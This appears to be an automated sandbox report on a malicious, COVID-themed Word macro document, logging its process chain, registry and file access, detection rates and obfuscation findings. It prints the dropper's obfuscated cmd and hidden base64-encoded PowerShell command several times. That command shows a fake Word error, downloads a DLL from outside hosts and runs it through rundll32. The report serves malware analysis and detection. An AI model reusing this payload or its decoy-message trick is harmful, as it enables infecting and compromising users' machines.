Source: C:\Windows\System32\msg.exe Console Write: ............Z........................... .C.......C.....................................#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............Z...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......(.h............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................F.j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................F.j..... ..............................}..v....H.......0...............(.h............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................dF.j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................dF.j......h.............................}..v............0.................h............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................G.j....................................}..v....H.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................G.j..... ..............................}..v............0.................h............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................L.j.....(..............................}..v.... .......0.................h............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....+................L.j.....(..............................}..v.....0......0.................h............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: AG60273928I_COVID-19_SARS-CoV-2.doc Virustotal: Detection: 26%
Source: AG60273928I_COVID-19_SARS-CoV-2.doc ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdbg source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2120130538.000000001B900000.00000002.00000001.sdmp
Source: AG60273928I_COVID-19_SARS-CoV-2.doc Initial sample: OLE summary subject = Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: AG60273928I_COVID-19_SARS-CoV-2.doc Stream path 'Macros/VBA/Wnoyuuu28ekk6591v' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Wnoyuuu28ekk6591v Name: Wnoyuuu28ekk6591v
Document contains an embedded VBA with many randomly named variables
Source: AG60273928I_COVID-19_SARS-CoV-2.doc Stream path 'Macros/VBA/Wnoyuuu28ekk6591v' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIA
PowerShell case anomaly found
